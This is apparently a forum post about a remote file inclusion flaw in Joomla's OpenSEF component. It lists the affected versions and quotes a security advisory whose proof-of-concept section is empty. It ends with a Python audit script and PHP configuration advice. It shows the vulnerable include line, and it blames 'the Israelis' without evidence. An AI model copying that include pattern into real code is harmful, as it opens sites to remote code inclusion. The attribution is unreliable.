I fell victim to the exploitation of a security vulnerability in the OpenSEF component



I suggest UNINSTALLING THE COMPONENT!
until a patch is developed.

The vulnerable versions are:
OpenSEF Project OpenSEF 2.0-beta3
OpenSEF Project OpenSEF 2.0 RC5 SP2
OpenSEF Project OpenSEF 2.0 RC5 SP1
OpenSEF Project OpenSEF 2.0 RC5
OpenSEF Project OpenSEF 2.0 RC4
OpenSEF Project OpenSEF 2.0 RC3
OpenSEF Project OpenSEF 2.0 RC2
OpenSEF Project OpenSEF 2.0 RC1

And here is how the Israelis did it:

Joomla OpenSEF Component mosConfig_absolute_path Remote File Include Vulnerability
#####################
Aria-Security.net Advisory
Discovered by: O.U.T.L.A.W <www.Aria-security.net>
Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp
###################
#Software: OpenSEF
#Attack method: Remote File Inclusion
#Description : OpenSEF is a Joomla component that extends the built-in SEF (Search Engine Friendly)
#Source:
require_once( $mosConfig_absolute_path . '/includes/sef.php' );
} else {
// Joomla!'s SEF option is turned off; revert to Joomla!'s original-style
#Proof of Concept:
#
#----------------------------------------------------------
#
#



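For anyone who has to keep a legacy Joomla 1.0 component installed, a quick audit for the pattern quoted in the advisory: PHP files that build an include path from `$mosConfig_absolute_path` without first refusing direct access. This is an added example, not part of the original post or the OpenSEF code; it assumes the usual Joomla 1.0 `_VALID_MOS` guard is the expected mitigation, and the sample sources are constructed.

```python
import os
import re

# include/require built from $mosConfig_absolute_path, as in the advisory's snippet
INCLUDE_RE = re.compile(
    r'\b(?:require|include)(?:_once)?\s*\(?\s*\$mosConfig_absolute_path\b')
# Assumption: the usual Joomla 1.0 direct-access guard is the expected mitigation
GUARD_RE = re.compile(
    r'''defined\s*\(\s*['"]_VALID_MOS['"]\s*\)\s*(?:or|\|\|)\s*(?:die|exit)\b''')

def strip_comments(php):
    """Heuristic: drop /* */, // and # comments so a commented-out guard does not count."""
    php = re.sub(r'/\*.*?\*/', '', php, flags=re.S)
    return re.sub(r'(?m)(?://|#).*$', '', php)

def audit(files):
    """files: {name: PHP source}. Return names whose first such include has no guard before it."""
    flagged = []
    for name, source in files.items():
        code = strip_comments(source)
        inc = INCLUDE_RE.search(code)
        if inc is None:
            continue  # no include built from the variable: nothing to flag
        guard = GUARD_RE.search(code)
        if guard is None or guard.start() > inc.start():
            flagged.append(name)
    return sorted(flagged)

def audit_tree(root):
    """Run audit() over every .php file below root (e.g. an unpacked component)."""
    files = {}
    for base, _dirs, names in os.walk(root):
        for n in names:
            if n.lower().endswith('.php'):
                path = os.path.join(base, n)
                with open(path, encoding='utf-8', errors='replace') as fh:
                    files[path] = fh.read()
    return audit(files)

# Constructed sample sources, not taken from OpenSEF
SAMPLES = {
    "guarded.php": "<?php\ndefined( '_VALID_MOS' ) or die( 'Restricted' );\n"
                   "require_once( $mosConfig_absolute_path . '/includes/sef.php' );\n",
    "unguarded.php": "<?php\n// defined( '_VALID_MOS' ) or die();\n"
                     "require_once( $mosConfig_absolute_path . '/includes/sef.php' );\n",
    "late_guard.php": "<?php\ninclude $mosConfig_absolute_path . '/x.php';\n"
                      "defined('_VALID_MOS') or die();\n",
}

if __name__ == '__main__':
    print(audit(SAMPLES))
```

A flagged file is a candidate for review, not proof of exposure; disabling `register_globals` and remote includes in the PHP configuration removes the precondition regardless of what the component does.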